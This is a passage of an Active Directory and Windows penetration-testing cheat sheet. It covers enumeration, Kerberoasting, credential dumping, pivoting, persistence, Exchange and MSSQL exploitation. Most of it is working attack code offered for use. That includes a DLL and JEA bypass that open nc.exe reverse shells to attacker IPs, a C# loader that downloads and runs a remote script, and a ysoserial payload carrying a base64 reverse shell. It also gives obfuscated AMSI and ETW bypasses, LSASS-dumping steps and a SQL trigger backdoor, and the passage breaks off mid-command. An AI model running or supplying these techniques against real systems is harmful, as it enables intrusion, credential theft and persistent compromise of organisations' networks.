Path Injection](#unc-path-injection) - [MC-SQLR Poisoning](#mc-sqlr-poisoning) - [DML, DDL and Logon Triggers](#dml-ddl-and-logon-triggers) - [Forest Persistence](#forest-persistence) - [DCShadow](#dcshadow) - [Cross Forest Attacks](#cross-forest-attacks) - [Trust Tickets](#trust-tickets) - [Using KRBTGT Hash](#using-krbtgt-hash) - [Azure Active Directory (AAD)](#azure-active-directory) - [AZ User Enumeration](#az-user-enumeration) - [PowerZure](#powerzure) - [Golden SAML](#golden-saml) - [PRT Manipulation](#passtheprt) - [MSOL Service Account](#msol-service-account) - [Miscs](#miscs) - [Domain Level Attribute](#domain-level-attribute) - [MachineAccountQuota (MAQ) Exploitation](#machineaccountquota-maq-exploitation) - [Bad-Pwd-Count](#bad-pwd-count) - [Abusing IPv6 in AD](#abusing-ipv6-in-ad) - [Rogue DHCP](#rogue-dhcp) - [IOXIDResolver Interface Enumeration](#ioxidresolver-interface-enumeration) - [References](#references) ## Tools **Powershell tools :** - `[โญ] Nishang` -> https://github.com/samratashok/nishang nishang has multiples useful scripts for windows pentesting in Powershell environement. - `[โญ] PowerView` -> https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 powerview is a script from powersploit that allow enumeration of the AD architecture for a potential lateral mouvement. **Enumeration tools :** - `[โญ] Bloodhound` -> https://github.com/BloodHoundAD/BloodHound - `[โญ] crackmapexec` -> https://github.com/byt3bl33d3r/CrackMapExe **AD exploitation toolkit :** - `[โญ] Impacket` -> https://github.com/SecureAuthCorp/impacket - `[โญ] kekeo` -> https://github.com/gentilkiwi/kekeo **Dumping Tools :** - `[โญ] mimikatz` -> https://github.com/gentilkiwi/mimikatz - `[โญ] rubeus` -> https://github.com/GhostPack/Rubeus **Listener Tool :** - `[โญ] responder` -> https://github.com/SpiderLabs/Responder ## Powershell Components ### Powershell Tricks **PS-Session** : ```powershell #METHOD 1 $c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negociate -Credential $user Enter-PSSession -Credential $c -ComputerName 10.10.13.100 # METHOD 2 $pass = ConvertTo-SecureString 'Ab!Q@aker1' -asplaintext -force $cred = New-Object System.Management.Automation.PSCredential('$user, $pass') Enter-PSSession -Credential $c -ComputerName 10.10.13.100 ``` ### PSWA Abusing allow anyone with creds to connect to any machine and any config **[ ! ] this action require credentials.** ```powershell Add-PswaAuthorizationRule -UsernName * -ComputerName * -ConfigurationName * ``` ## Enumeration ### Find user with SPN > using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) : ```powershell Get-NetUser โ€“SPN ``` > using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) : ```powershell Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName ``` ### Trusts Enumeration **MapTrust :** ```powershell Invoke-MapDomainTrust ``` **Domain trusts for the current domain :** > using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) : ```powershell Get-NetDomainTrust #Find potential external trust Get-NetDomainTrust โ€“Domain $domain ``` > using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) : ```powershell Get-ADTrust Get-ADTrust โ€“Identity $domain ``` ### Forest Enumeration **Details about the current forest :** ```powershell Get-NetForest Get-NetForest โ€“Forest $forest Get-ADForest Get-ADForest โ€“Identity $domain ``` ### GPO enumeration **List of GPO** ```powershell Get-NetGPO Get-NetGPO -ComputerName $computer Get-GPO -All Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html ``` ### ACL and ACE enumeration **Enumerate All ACEs** ```powershell Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} ``` #### Enumerate users and permissions ```powershell Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"} ``` *Verify if the user already has a SPN :* > using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) : ```powershell Get-DomainUser -Identity supportuser | select serviceprincipalname ``` > using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) : ```powershell Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName ``` ### LDAP Enumeration ```powershell ldapsearch -x -h 10.10.10.x -p 389 -s base namingcontexts ldapsearch -h 10.10.10.x -p 389 -x -b "dc=boxname,dc=local" ``` *find service accounts* ```powershell ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=box,dc=local" | grep "service" ``` *Enumeration with ldapsearch as authenticated user* ```powershell ldapsearch -x -h ldap.megacorp.corp -w '$pass' ldapsearch -x -h 10.10.131.164 -p 389 -b "dc=megacorp,dc=corp" -D 'john@megacorp.corp' -w 'vs2k6!' ldapsearch -D "cn=binduser,ou=users,dc=megacorp,dc=corp" -w 'J~42%W?]g' -s base namingcontexts ldapsearch -D "cn=binduser,ou=users,dc=megacorp,dc=corp" -w 'J~42%W?]g' -b 'dc=megacorp' ``` *Enumeration with ldapdomaindump (authenticated) with nice output* ``` ldapdomaindump 10.10.197.117 -u 'megacorp.corp\john' -p '$pass' --no-json --no-grep ``` *Enumeration with nmap scripts* ```bash nmap -p 389 --script ldap-search 10.10.10.x nmap -n -sV --script "ldap*" -p 389 10.10.10.x nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='MEGACORP.CORP',userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt 10.10.13.100 ``` ### SMB Enumeration *enumeration with crackmapexec as unauthenticated* ```bash crackmapexec smb 10.10.10.x --pass-pol -u '' -p '' ``` *enumeration with crackmapexec (authenticated)* ```powershell crackmapexec smb 10.10.11.129 --pass-pol -u usernames.txt -p $pass --continue-on-sucess crackmapexec smb 10.10.11.129 --pass-pol -u xlsx_users -p $pass --continue-on-sucess ``` *enumeration with kerbrute, against Kerberos pre-auth bruteforcing:* ```bash /opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d megacorp.local --dc 10.10.13.100 -o kerbrute.out users.txt /opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d megacorp.htb --dc 10.10.13.100 -o kerbrute.out users.lst --downgrade ``` > by default, kerbrute uses the most secure mode (18 = sha1) to pull some hash. Using the downgrade option we can pull the deprecaded encryption type version (23 = rc4hmac). Or use getNPusers to get some hash instead, it's safer! *provide a password or a list of passwords to test against users* ```bash crackmapexec smb 10.10.13.100 --pass-pol -u users.lst -p password_list ``` *Enumerate some users* ```bash crackmapexec smb 10.10.13.100 -u users.txt -p $pass --users | tee userlist.txt ``` ### Password Spraying on the domain ```bash /opt/kerbrute/dist/kerbrute_linux_amd64 passwordspray -d MEGACORP.CORP --dc 10.10.13.100 users.lst '$pass' ``` **Dump Domain, Groups and Users using Bloodhound-Python:** ```bash bloodhound-python -c all -u $user -p $password -d $domain -dc $dc_domain -ns $ip --disable-pooling -w1 --dns-timeout 30 ``` Setting up Bloodhound: ```bash sudo neo4j console sudo bloodhound ``` ## RID Cycling *Global Structure :* ``` S-1-5-21-40646273370-24341400410-2375368561-1036 ``` - `S-1-5-21`: **S refers SID (Security Identifier)** - `40646273370-24341400410-2375368561`: **Domain or Local Computer Identifier** - `1036`: **RID (Relative Identifier)** *User SID Structure :* - `S-1-5-21-40646273370-24341400410-2375368561`: **Domain SID** - `1036`: **User RID** > using [Crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec) : ```bash cme smb $target -u $username -p $password --rid-brute ``` > using [lookupsid](https://github.com/SecureAuthCorp/impacket/blob/cd4fe47cfcb72d7d35237a99e3df95cedf96e94f/examples/lookupsid.py) : ```bash lookupsid.py MEGACORP/$user:'$password'@$target 20000 ``` the value "20000" in lookupsid is to indicate how many RID will be tested ## Privilege Escalation ### Token Impersonation > The Impersonation token technique allows to impersonate a user by stealing his token, this token allows to exploit this technique because of the SSO processes, Interactive Logon, process running... > using [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) : *list tokens* ```powershell # Show all tokens Invoke-TokenManipulation -ShowAll # show usable tokens Invoke-TokenManipulation -Enumerate ``` *Start a new process with the token of a user* ```powershell Invoke-TokenManipulation -ImpersonateUser -Username "domain\user" ``` *process token manipulation* ```powershell Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -ProcessId $id ``` > using [Incognito](https://github.com/FSecureLABS/incognito) : *load incognito and list tokens :* ```bash meterpreter > use incognito meterpreter > list_tokens -g ``` *impersonate token of "NT AUTHORITY\SYSTEM" :* ```powershell meterpreter > getuid Server username: job\john meterpreter > impersonate_token "BUILTIN\Administrators" [+] Delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEM meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` ### Kerberoasting **Enumerate kerberoastable user** ```powershell Get-DomainUser -SPN | select name,serviceprincipalname ``` > using [impacket](https://github.com/SecureAuthCorp/impacket) : ```powershell GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password' ``` > using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec) ```powershell crackmapexec ldap $target -u $user -p $password --kerberoasting kerberoastable.txt --kdcHost $kdc ``` *crack the hash :* ```bash # using JTR : john --format=krb5tgs spn.txt --wordlist=wordlist.txt # using hashcat : hashcat -m 13100 -a 0 spn.txt wordlist.txt --force ``` ### ASREPRoasting **Enumerate asreproastable user** ```powershell Get-DomainUser -PreauthNotRequired | select name ``` ```powershell GetNPUsers.py -format hashcat -outputfile ASREProastables.txt -dc-ip $kdc '$domain/$user:$password' -request ``` *cracking the hash :* `hashcat -m 18200 -a 0 hash wordlist.txt --force` ### DNSAdmin > Enumerate users in this group : ```powershell # METHOD 1 Get-NetGroupMember -GroupName "DNSAdmins" # METHOD 2 Get-ADGroupMember -Identity DNSAdmins ``` *This attack consists of injecting a malicious arbitrary DLL and restarting the dns.exe service, since the DC serves as a DNS service, we can elevate our privileges to a DA.* > DLL File : ```c #include "stdafx.h" #include <stdlib.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: system("c:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.51 5555"); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } ``` you can also create a dll file using msfvenom : `msfvenom -p windows/x64/exec cmd='net user administrator aked /domain' - f dll > evil.dll` it'll execute `net user administrator aked /domain` with SYSTEM privileges set the remote DLL path into the Windows Registry ```powershell dnscmd dc01 /config /serverlevelplugindll \\10.10.14.33\share\evil.dll ``` `\\10.10.14.33\share\evil.dll` : SMB Share. **restart DNS service** ```powershell sc.exe stop dns sc.exe start dns ``` ## Lateral Mouvement ### WMIExec *uses kerberos auth* ```powershell impacket-wmiexec -k -no-pass administrator@10.10.10.248 ``` ## Credentials Dumping ### LSASS Dumping ```powershell cme <protocol> <ip> -u <user> -p <pass> -M lsassy ``` - https://github.com/Hackndo/lsassy ```powershell procdump --accepteula -ma lsass lsass.dmp ``` ```powershell smbclient.py MEGACORP.LOCAL/john@dc01.megacorp.local # use C$ # cd Windows\Temp # put procdump.exe ``` ```powershell psexec.py MEGACORP.LOCAL/john@dc01.megacorp.local "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp" ``` ```powershell smbclient.py MEGACORP.LOCAL/john@dc01.megacorp.local # get lsass.dmp ``` > parse creds with mimikatz ```powershell sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords ``` you can do it locally with mimikatz using : `sekurlsa::logonpasswords`. ### NTDS Dumping **Abusing DRSUAPI for NTDS dumping** ```powershell crackmapexec smb 10.10.13.100 -u 'Administrator' -p $password --ntds drsuapi ``` **Abusing VSS for NTDS dumping** > using [Crackmapexec]() : ```powershell crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds vss ``` *you can do it manually too.* ```powershell vssadmin create shadow /for=C: copy $ShadowCopyName\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save vssadmin delete shadows /shadow=$ShadowCopyId ``` ### DPAPI Abusing > dump DPAPI BK ```bash dpapi.py backupkeys -t $domain/$user:$password@$target ``` > Decrypt DPAPI MK ```bash # Decrypt DPAPI MK using BK dpapi.py masterkey -file "/path/to/masterkey" -pvk "/path/to/backup_key.pvk" # Decrypt DPAPI MK using MK password and user SID dpapi.py masterkey -file "/path/to/masterkey" -sid $USER_SID -password $mk_password ``` > decrypting protected file using MK ```bash dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY ``` *crack DPAPI master key with JTR* ```bash python DPAPImk2john.py --sid="$SID" --masterkey="$MASTER_KEY" --context="local" john dpapimk.dmp --wordlist=/usr/share/wordlists/rockyou.txt --rules=custom.rule ``` ### LSA Dumping **you can use mimikatz with this command : `lsadump::secrets`** ### SAM Dumping *save SYSTEM hive and SAM in another directory* ```powershell reg save HKLM\SAM c:\path\to\SAM reg save HKLM\SYSTEM c:\path\to\SYSTEM ``` ```powershell lsadump::sam /system:c:\path\to\SYSTEM /sam:c:c:\path\to\SAM ``` or just use : `lsadump::sam` **[ ๐Ÿ“ ] Notes** : *you can dump SAM and LSA with crackmapexec **or** secretdump using these commands :* ```bash secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET' ``` ```bash crackmapexec smb $ip -d $domain -u $user -p $password --sam/--lsa ``` ### Dump Registry Remotely and Directly [ โ“ ] **What is Registry ?** : the Registry is divided into several sections called **hives**. A registry hive is a top level registry key predefined by the Windows system to store **registry keys** for specific objectives. Each registry hives has specific objectives, there are **6 registry hives, HKCU, HKLM, HKCR, HKU, HKCC and HKPD** the most enteresting registry hives in pentesting is HKU and HKLM. **HKEY_LOCAL_MACHINE** called HKLM includes three keys SAM, SYSTEM, and SECURITY. > dump SYSTEM and SECURITY remotely from HKLM : ```bash secretsdump.py local -system SYSTEM -security SECURITY -ntds ntds.dit -outputfile hashes ``` > dump HKU registry remotely with hashes argument : ```bash impacket-reg -hashes :34ed87d42adaa3ca4f5db34a876cb3ab domain.local/john.doe@job query -keyName HKU\\Software HKU\Software HKU\Software\GiganticHostingManagementSystem HKU\Software\Microsoft HKU\Software\Policies HKU\Software\RegisteredApplications HKU\Software\Sysinternals HKU\Software\VMware, Inc. HKU\Software\Wow6432Node HKU\Software\Classes ``` ### Read GMSA Password ```powershell $user = 'USER' $gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword' $blob = $gmsa.'msDS-ManagedPassword' $mp = ConvertFrom-ADManagedPasswordBlob $blob $cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword ```` *gMSA dumping:* ```bash python3 gMSADumper.py -u $user -p $password -d $domain.local ``` ## Hash Cracking > LM : ```bash # using JTR : john --format=lm hash.txt # using hashcat : hashcat -m 3000 -a 3 hash.txt ``` > NT : ```bash # using JTR : john --format=nt hash.txt --wordlist=wordlist.txt # using hashcat : hashcat -m 1000 -a 3 hash.txt ``` > NTLMv1 : ```bash # using JTR : john --format=netntlmv1 hash.txt # using hashcat : hashcat -m 5500 --force -a 0 hash.txt wordlist.txt ``` > NTLMv2 : ```bash # using JTR : john --format=netntlmv2 hash.txt # using hashcat : hashcat -m 5600 --force -a 0 hash.txt wordlist.txt ``` note : some Hash Type in hashcat depend of the **etype** ## Bruteforce AD Password ### Custom Username and Password wordlist default password list (pwd_list) : ` Autumn Spring Winter Summer ` create passwords using bash & hashcat : ```bash for i in $(cat pwd_list); do echo $i, echo ${i}\!; echo ${i}2019; echo ${i}2020 ;done > pwds haschat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule haschat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule -r /usr/share/hashcat/rules/toogles1.r | sort u haschat --force --stdout pwds -r /usr/share/hashcat/rules/base64.rule -r /usr/share/hashcat/rules/toogles1.r | sort u | awk 'length($0) > 7' > pwlist.txt ``` default username list (users.list) : ``` john doe paul smith jacaques miller ``` create custom usernames using username-anarchy : ```bash ./username-anarchy --input-file users.list --select-format first,first.last,f.last,flast > users2.list ``` ## Pivoting **Pivot with WDFW via custom rules** ```powershell netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCALPORT connectaddress=REMOTE_ADDRESS connectport=REMOTE_PORT protocol=tcp ``` *allow connections to localport* ```powershell netsh advfirewall firewall add rule name="pivot like a pro" protocol=TCP dir=in localip=LOCAL_ADDRESS localport=LOCAL_PORT action=allow ``` ### SMB Pipes **Local/Remote ports can be forwarded** using **SMB pipes**. You can use [Invoke-Piper](https://github.com/p3nt4/Invoke-Piper) or [Invoke-SocksProxy](https://github.com/p3nt4/Invoke-SocksProxy) for that. - `Invoke-Piper` : *used to forward local or remote ports* - `Invoke-SocksProxy` : *used for dynamic port forwarding* **Case 1** *Local port forwarding through pipe forPivot: `-L 33389:127.0.0.1:3389`* > SERVER SIDE : ```powershell Invoke-PiperServer -bindPipe forPivot -destHost 127.0.0.1 -destPort 3389 ``` > CLIENT SIDE : ```powershell Invoke-PiperClient -destPipe forPivot -pipeHost $server_ip -bindPort 33389 ``` **Case 2** *Admin only remote port forwarding through pipe forPivot: `-R 33389:127.0.0.1:3389`* > SERVER SIDE : ```powershell Invoke-PiperServer -remote -bindPipe forPivot -bindPort 33389 -security Administrators ``` > CLIENT SIDE : ```powershell Invoke-PiperClient -remote -destPipe forPivot -pipeHost $server_ip -destHost 127.0.0.1 -destPort 3389 ``` **Case 3** *Dynamic port forwarding with Invoke-SocksProxy with forPivot as NamedPipe: `-D 3333`* > SERVER SIDE : ```powershell Invoke-SocksProxy -bindPort 3333 Invoke-PiperServer -bindPipe forPivot -destHost 127.0.0.1 -destPort 3333 ``` > CLIENT SIDE : ```powershell Invoke-PiperClient -destPipe forPivot -pipeHost $server_ip -bindPort 3333 ``` ### SharpSocks **SharpSocks is mostly used in C2 Frameworks and work with C2 Implants** *build a server:* ```powershell PS> .\SharpSocksServer.exe --cmd-id=$id --http-server-uri=$uri --encryption-key=$key -v ``` ### RDP Tunneling via DVC *sharings drives:* ```powershell PS > regsvr32 UDVC-Plugin.dll PS > subst.exe x: C:\Users\john\RDP_Tools ``` *map the drives:* ```powershell PS > net use x: \\TSCLIENT\X ``` create a server with SSFD.exe ```powershell PS > ssfd.exe -p 8080 ``` *Redirect SSF port with DVC server:* ```powershell PS > ./UDVC-Server.exe -c -p 8080 -i 127.0.0.1 [*] Setting up client socket [*] Connected to: 127.0.0.1:8080 [*] Starting thread RsWc [*] Starting thread RcWs [*] Wait for threads to exit... ``` *SSFD as a SOCK proxy* ```powershell PS > ssf.exe -D 9090 -p 31337 127.0.0.1 ``` ## Persistence ### SIDHistory Injection ### AdminSDHolder and SDProp > [ โ“ ] : With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions\) to the AdminSDHolder object. In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it. > using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) : ```powershell Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights All -Verbose ``` > using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) : ```powershell Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=megacorp,DC=megacorp,DC=local' -Principal $user -Verbose Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights ResetPassword -Verbose Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName $user -Rights WriteMembers -Verbose ``` *Run SDProp manually* ```powershell Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose ``` ## ACLs and ACEs Abusing ### GenericAll **list all groups to which the user belongs and has explicit access rights** ```powershell Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}} ``` ```powershell net group Administrator aker /add /domain ``` ## Enhanced Security Bypass ### AntiMalware Scan Interface ```powershell sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ``` patching AMSI from Powershell6 : ```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` ### ConstrainLanguageMode Bypass CLM using **runspace**: ```cs static void Main(string[] args){ Runspace run = RunspaceFactory.CreateRunspace(); run.Open(); PowerShell shell = PowerShell.Create(); shell.Runspace = run; String cmd = "iex(new-object net.webclient).DownloadString('http://10.10.14.33/script')"; shell.AddScript(cmd); shell.Invoke(); run.Close(); } ``` ### Just Enough Administration > show current languages level : ```powershell # METHOD 1 (Get-PSSessionConfiguration -Name Test).LanguageMode # METHOD 2 $ExecutionContext.SessionState.LanguageMode # use property ``` > Bypass JEA in ConstrainedLanguage : ```powershell { C:\Windows\System32\spool\drivers\color\nc.exe -e powershell.exe 10.10.14.33 9003 } ``` ### ExecutionPolicy ```powershell powershell -ExecutionPolicy Bypass -File C:\script.ps1 ``` > bypass EP using encoding : ```powershell $command = "Write-Host 'hello world'"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($command);$encoded = [Convert]::ToBase64String($bytes); powershell.exe -EncodedCommand $encoded ``` ### RunAsPPL for Credentials Dumping [ โ“ ] : [RunAsPPL](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection) is an **additional LSA protection** to prevent reading memory and code injection by **non-protected processes**. > bypass RunAsPPL with mimikatz : ``` mimikatz # privilege::debug mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # misc::skeleton mimikatz # !- ``` ### ETW Disabling ```powershell [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) ``` you can try obfuscation techniques on this command. To learn more about ETW see my course [here](https://github.com/RistBS/Active-directory-Cheat-sheet/blob/exploit-development/FR%20-%20ETW%20Bypassing.md) ## MS Exchange ### OWA EWS and EAS Password Spraying > using [MailSniper](https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1) : ```powershell # OWA (Outlook web App) Invoke-PasswordSprayOWA -ExchHostname $domain -UserList .\users.txt -Password $password # EAS (Exchange ActivSync) Invoke-PasswordSprayEAS -ExchHostname $domain -UserList .\users.txt -Password $password # EWS (Exchange Web Service) Invoke-PasswordSprayEWS -ExchHostname $domain -UserList .\users.txt -Password $password ``` > using [ruler](https://github.com/sensepost/ruler) : ```bash ./ruler -domain $domain --insecure brute --userpass $userpass.txt -v ``` ### GAL and OAB Extraction **GAL (Global Address Book) Extraction** ```powershell ./ruler -k -d $domain -u $user -p $password -e user@example.com --verbose abk dump -o email_list.txt ``` > using powershell : ```powershell PS C:\> Get-GlobalAddressList -ExchHostname mx.megacorp.com -UserName $domain\$user -Password $password -OutFile email_list.txt ``` **OAB (Offline Address Book) Extraction** *extract OAB.XML file which contains records* ```bash curl -k --ntlm -u '$domain\$user:$password' https://$domain/OAB/$OABUrl/oab.xml > oab.xml cat oab.xml |grep '.lzx' |grep data ``` *extract LZX compressed file* ```bash curl -k --ntlm -u '$domain\$user:$password' https://$domain/OAB/$OABUrl/$OABId-data-1.lzx > oab.lzx ./oabextract oab.lzx oab.bin && strings oab.bin |egrep -o "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])" | sort -u > emails.txt ``` > using [oaburl.py](https://gist.github.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438) : ```powershell ./oaburl.py $domain/$user:$password@domain.com -e valid@domain.com ``` ### PrivExchange **[PrivExchange](https://github.com/dirkjanm/PrivExchange) use PushSubscription Feature, a user is able to capture the NTLM authentication data of an Exchange server With a simple call to the "PushSubscription" API** ```bash responder -I eth0 -Av python3 privexchange.py -d $domain -u $user -p $password -ah -ap '/test/test/test' mx.server.com --debug ``` ### ProxyLogon **[ProxyLogon](https://github.com/hausec/ProxyLogon) is the name given to CVE-2021-26855 that allows an attacker to bypass authentication and impersonate users on MS Exchange servers** ```bash python proxylogon.py $ip user@fqdn ``` > using metasploit: ```bash use auxiliary/scanner/http/exchange_proxylogon use auxiliary/gather/exchange_proxylogon use exploit/windows/http/exchange_proxylogon_rce ``` ### CVE-2020-0688 this CVE allow RCE on EWS through fixed cryptographic keys *Get Values for RCE :* - *ViewStateUserKey* : `document.getElementById("_VIEWSTATEGENERATOR").value` - *ViewStateGenerator* : `ASP.NET_SessionId` ```powershell ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -exec bypass -enc JHNtPShOZXctT2JqZWN0IE5ldC5Tb2NrZXRzLlRDUENsaWVudCgiMTAuMTAuMTQuOSIsOTAwNikpLkdldFN0cmVhbSgpO1tieXRlW11dJGJ0PTAuLjY1NTM1fCV7MH07d2hpbGUoKCRpPSRzbS5SZWFkKCRidCwwLCRidC5MZW5ndGgpKSAtbmUgMCl7OyRkPShOZXctT2JqZWN0IFRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRidCwwLCRpKTskc3Q9KFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKChpZXggJGQgMj4mMSkpOyRzbS5Xcml0ZSgkc3QsMCwkc3QuTGVuZ3RoKX0=" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug โ€“islegacy ``` ## MSSQL Server ### UNC Path Injection [ โ“ ] : Uniform Naming Convention __allows the sharing of resources__ on a network via a very precise syntax: `\IP-Server\shareName\Folder\File` launch responder : `responder -I eth0` ```sql EXEC master..xp_dirtree \"\\\\192.168.1.33\\\\evil\"; ``` ```sql 1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- ``` ### MC-SQLR Poisoning *The SQL Server Resolution Protocol is a simple application-level protocol that is used for the transfer of requests and responses between clients and database server discovery services.* ```vbs CreateObject("ADODB.Connection").Open "Provider=SQLNCLI11;Data Source=DOESNOTEXIST\INSTANCE;Integrated Security=SSPI;" ``` > we captured the hash of the **Administrator** with this VBA script. ```python [+] Listening for events... [*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist [MSSQL-BROWSER] Sending poisoned browser response to 10.10.14.33 [*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist [*] [LLMNR] Poisoned answer sent to 10.10.14.33 for name doesnotexist [MSSQL] NTLMv2 Client : 10.1.2.3 [MSSQL] NTLMv2 Username : TEST\Administrator [MSSQL] NTLMv2 Hash : Administrator::TEST:1122334455667788... ``` ### DML, DDL and Logon Triggers [ โ“ ] : **Triggers** are a stored procedure that automatically executes when an event occurs in the SQL Server. - Data Definition Language (DDL) โ€“ Executes on Create, Alter and Drop statements and some system stored procedures. - Data Manipulation Language (DML) โ€“ Executes on Insert, Update and Delete statements. - Logon Triggers โ€“ Executes on a user logon. **Triggers Listing** *list All triggers* ```sql SELECT * FROM sys.server_triggers ``` *list triggers for a database* ```sql SELECT * FROM sys.server_triggers ``` *list DDL and DML triggers on an instance using powershell* ```powershell Get-SQLTriggerDdl -Instance ops-sqlsrvone -username $username -Password $password -Verbose Get-SQLTriggerDml -Instance ops-sqlsrvone -username $username -Password $password -Verbose ``` *use DML triggers for persistence* ```sql USE master GRANT IMPERSONATE ON LOGIN::sa to [Public]; USE testdb CREATE TRIGGER [persistence_dml_1] ON testdb.dbo.datatable FOR INSERT, UPDATE, DELETE AS EXECUTE AS LOGIN = 'as' EXEC master..xp_cmdshell 'powershell -C "iex (new-object 